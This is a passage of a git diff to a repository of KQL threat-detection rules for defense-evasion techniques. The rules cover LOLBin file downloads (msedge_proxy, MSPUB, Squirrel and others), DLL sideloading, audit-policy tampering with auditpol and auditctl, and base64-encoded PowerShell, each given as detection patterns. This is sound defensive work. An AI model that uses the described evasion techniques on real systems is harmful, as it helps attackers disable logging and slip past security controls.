ProcessVersionInfoOriginalFileName =~ "imewdbld.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql index d60733b3..24155d2f 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msedge_proxy_exe.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2023-11-09 -// Level: medium -// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Arbitrary File Download Via MSEDGE_PROXY.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: medium +// Description: Detects usage of "msedge_proxy.exe" to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\msedge_proxy.exe" or ProcessVersionInfoOriginalFileName =~ "msedge_proxy.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql index 13bfc92f..52743a07 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_msohtmed_exe.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary File Download Via MSOHTMED.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects usage of "MSOHTMED" to download arbitrary files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Arbitrary File Download Via MSOHTMED.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects usage of "MSOHTMED" to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSOHTMED.exe" or ProcessVersionInfoOriginalFileName =~ "MsoHtmEd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql index 0c4f3350..02fb0133 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_mspub_exe.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary File Download Via MSPUB.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Arbitrary File Download Via MSPUB.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\MSPUB.exe" or ProcessVersionInfoOriginalFileName =~ "MSPUB.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql index bf1c0eb9..6c3ffac9 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_presentationhost_exe.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary File Download Via PresentationHost.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Arbitrary File Download Via PresentationHost.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql index 8730c452..a9df2741 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_squirrel_exe.kql @@ -1,12 +1,12 @@ -// Title: Arbitrary File Download Via Squirrel.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community -// Date: 2022-06-09 -// Level: medium -// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 -// False Positives: -// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) - -DeviceProcessEvents +// Title: Arbitrary File Download Via Squirrel.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community +// Date: 2022-06-09 +// Level: medium +// Description: Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Expected FP with some Electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop, etc.) + +DeviceProcessEvents | where (ProcessCommandLine contains " --download " or ProcessCommandLine contains " --update " or ProcessCommandLine contains " --updateRollback=") and ProcessCommandLine contains "http" and (FolderPath endswith "\\squirrel.exe" or FolderPath endswith "\\update.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql index 0674ea72..b905f641 100644 --- a/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/aruba_network_service_potential_dll_sideloading.kql @@ -1,10 +1,10 @@ -// Title: Aruba Network Service Potential DLL Sideloading -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-22 -// Level: high -// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001 - -DeviceImageLoadEvents +// Title: Aruba Network Service Potential DLL Sideloading +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: high +// Description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.persistence, attack.t1574.001 + +DeviceImageLoadEvents | where ((FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\msvcr100.dll" or FolderPath endswith "\\msvcp100.dll" or FolderPath endswith "\\dbghelp.dll" or FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\dpapi.dll") and InitiatingProcessFolderPath endswith "\\arubanetsvc.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql index 65278ddd..ac55367d 100644 --- a/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql +++ b/KQL/rules/Defense Evasion/aspnetcompiler_execution.kql @@ -1,10 +1,10 @@ -// Title: AspNetCompiler Execution -// Author: frack113 -// Date: 2021-11-24 -// Level: medium -// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: AspNetCompiler Execution +// Author: frack113 +// Date: 2021-11-24 +// Level: medium +// Description: Detects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql index 52d6cf47..981daf77 100644 --- a/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql +++ b/KQL/rules/Defense Evasion/assembly_loading_via_cl_loadassembly_ps1.kql @@ -1,10 +1,10 @@ -// Title: Assembly Loading Via CL_LoadAssembly.ps1 -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-21 -// Level: medium -// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 - -DeviceProcessEvents +// Title: Assembly Loading Via CL_LoadAssembly.ps1 +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-21 +// Level: medium +// Description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents | where ProcessCommandLine contains "LoadAssemblyFromPath " or ProcessCommandLine contains "LoadAssemblyFromNS " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql index 4fc52334..2928004b 100644 --- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_auditpol.kql @@ -1,13 +1,13 @@ -// Title: Audit Policy Tampering Via Auditpol -// Author: Janantha Marasinghe (https://github.com/blueteam0ps) -// Date: 2021-02-02 -// Level: high -// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. -// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 -// False Positives: -// - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored - -DeviceProcessEvents +// Title: Audit Policy Tampering Via Auditpol +// Author: Janantha Marasinghe (https://github.com/blueteam0ps) +// Date: 2021-02-02 +// Level: high +// Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. +// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored + +DeviceProcessEvents | where (ProcessCommandLine contains "disable" or ProcessCommandLine contains "clear" or ProcessCommandLine contains "remove" or ProcessCommandLine contains "restore") and (FolderPath endswith "\\auditpol.exe" or ProcessVersionInfoOriginalFileName =~ "AUDITPOL.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql index c0c1dfd3..75a6e4f2 100644 --- a/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql +++ b/KQL/rules/Defense Evasion/audit_policy_tampering_via_nt_resource_kit_auditpol.kql @@ -1,13 +1,13 @@ -// Title: Audit Policy Tampering Via NT Resource Kit Auditpol -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-12-18 -// Level: high -// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. -// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 -// False Positives: -// - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure - -DeviceProcessEvents +// Title: Audit Policy Tampering Via NT Resource Kit Auditpol +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-18 +// Level: high +// Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. +// This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure + +DeviceProcessEvents | where ProcessCommandLine contains "/logon:none" or ProcessCommandLine contains "/system:none" or ProcessCommandLine contains "/sam:none" or ProcessCommandLine contains "/privilege:none" or ProcessCommandLine contains "/object:none" or ProcessCommandLine contains "/process:none" or ProcessCommandLine contains "/policy:none" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql index 0cfe2afe..09580819 100644 --- a/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql +++ b/KQL/rules/Defense Evasion/audit_rules_deleted_via_auditctl.kql @@ -1,14 +1,14 @@ -// Title: Audit Rules Deleted Via Auditctl -// Author: Mohamed LAKRI -// Date: 2025-10-17 -// Level: high -// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. -// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. -// Removal of audit rules can significantly impair detection of malicious activities on the affected system. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.012 -// False Positives: -// - An administrator troubleshooting. Investigate all attempts. - -DeviceProcessEvents +// Title: Audit Rules Deleted Via Auditctl +// Author: Mohamed LAKRI +// Date: 2025-10-17 +// Level: high +// Description: Detects the execution of 'auditctl' with the '-D' command line parameter, which deletes all configured audit rules and watches on Linux systems. +// This technique is commonly used by attackers to disable audit logging and cover their tracks by removing monitoring capabilities. +// Removal of audit rules can significantly impair detection of malicious activities on the affected system. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.012 +// False Positives: +// - An administrator troubleshooting. Investigate all attempts. + +DeviceProcessEvents | where ProcessCommandLine matches regex "-D" and FolderPath endswith "/auditctl" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql index 08ca00c1..39c09b7d 100644 --- a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql +++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl.kql @@ -1,12 +1,12 @@ -// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl -// Author: Julia Fomina, oscd.community -// Date: 2020-10-06 -// Level: medium -// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +// Author: Julia Fomina, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "winrm" and ((ProcessCommandLine contains "format:pretty" or ProcessCommandLine contains "format:\"pretty\"" or ProcessCommandLine contains "format:\"text\"" or ProcessCommandLine contains "format:text") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql index 9c6576c2..60d24e33 100644 --- a/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql +++ b/KQL/rules/Defense Evasion/awl_bypass_with_winrm_vbs_and_malicious_wsmpty_xsl_wsmtxt_xsl_file.kql @@ -1,12 +1,12 @@ -// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File -// Author: Julia Fomina, oscd.community -// Date: 2020-10-06 -// Level: medium -// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File +// Author: Julia Fomina, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath endswith "WsmPty.xsl" or FolderPath endswith "WsmTxt.xsl") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql index 58287020..33fcffde 100644 --- a/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql +++ b/KQL/rules/Defense Evasion/baaupdate_exe_suspicious_dll_load.kql @@ -1,12 +1,12 @@ -// Title: BaaUpdate.exe Suspicious DLL Load -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-10-18 -// Level: high -// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking. -// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) -// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 - -DeviceImageLoadEvents +// Title: BaaUpdate.exe Suspicious DLL Load +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-18 +// Level: high +// Description: Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking. +// This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94) +// which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 + +DeviceImageLoadEvents | where (FolderPath contains ":\\Perflogs\\" or FolderPath contains ":\\Users\\Default\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Roaming\\" or FolderPath contains "\\Contacts\\" or FolderPath contains "\\Favorites\\" or FolderPath contains "\\Favourites\\" or FolderPath contains "\\Links\\" or FolderPath contains "\\Music\\" or FolderPath contains "\\Pictures\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Temporary Internet" or FolderPath contains "\\Videos\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\BaaUpdate.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql index f69d45f0..f158ee74 100644 --- a/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql +++ b/KQL/rules/Defense Evasion/bad_opsec_defaults_sacrificial_processes_with_improper_arguments.kql @@ -1,14 +1,14 @@ -// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments -// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) -// Date: 2020-10-23 -// Level: high -// Description: Detects attackers using tooling with bad opsec defaults. -// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. -// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.011 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments +// Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) +// Date: 2020-10-23 +// Level: high +// Description: Detects attackers using tooling with bad opsec defaults. +// E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. +// One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not(((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall " and (InitiatingProcessFolderPath contains "\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql index e49aff2f..4cea30cb 100644 --- a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql +++ b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql @@ -1,12 +1,12 @@ -// Title: Base64 Encoded PowerShell Command Detected -// Author: Florian Roth (Nextron Systems) -// Date: 2020-01-29 -// Level: high -// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string -// MITRE Tactic: Defense Evasion -// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001 -// False Positives: -// - Administrative script libraries - -DeviceProcessEvents +// Title: Base64 Encoded PowerShell Command Detected +// Author: Florian Roth (Nextron Systems) +// Date: 2020-01-29 +// Level: high +// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string +// MITRE Tactic: Defense Evasion +// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001 +// False Positives: +// - Administrative script libraries + +DeviceProcessEvents | where ProcessCommandLine contains "::FromBase64String(" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/binary_padding_macos.kql b/KQL/rules/Defense Evasion/binary_padding_macos.kql index f60896e4..1bc6cb68 100644 --- a/KQL/rules/Defense Evasion/binary_padding_macos.kql +++ b/KQL/rules/Defense Evasion/binary_padding_macos.kql @@ -1,12 +1,12 @@ -// Title: Binary Padding - MacOS -// Author: Igor Fits, Mikhail Larin, oscd.community -// Date: 2020-10-19 -// Level: high -// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.001 -// False Positives: -// - Legitimate script work - -DeviceProcessEvents +// Title: Binary Padding - MacOS +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: high +// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.001 +// False Positives: +// - Legitimate script work + +DeviceProcessEvents | where ((ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/random" or ProcessCommandLine contains "if=/dev/urandom") and FolderPath endswith "/dd") or (ProcessCommandLine contains "-s +" and FolderPath endswith "/truncate") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql index 387192a4..ab552535 100644 --- a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql +++ b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql @@ -1,15 +1,15 @@ -// Title: BitLockerTogo.EXE Execution -// Author: Josh Nickels, mttaggart -// Date: 2024-07-11 -// Level: low -// Description: Detects the execution of "BitLockerToGo.EXE". -// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. -// This is a rarely used application and usage of it at all is worth investigating. -// Malware such as Lumma stealer has been seen using this process as a target for process hollowing. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage of BitLockerToGo.exe to encrypt portable devices. - -DeviceProcessEvents +// Title: BitLockerTogo.EXE Execution +// Author: Josh Nickels, mttaggart +// Date: 2024-07-11 +// Level: low +// Description: Detects the execution of "BitLockerToGo.EXE". +// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. +// This is a rarely used application and usage of it at all is worth investigating. +// Malware such as Lumma stealer has been seen using this process as a target for process hollowing. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of BitLockerToGo.exe to encrypt portable devices. + +DeviceProcessEvents | where FolderPath endswith 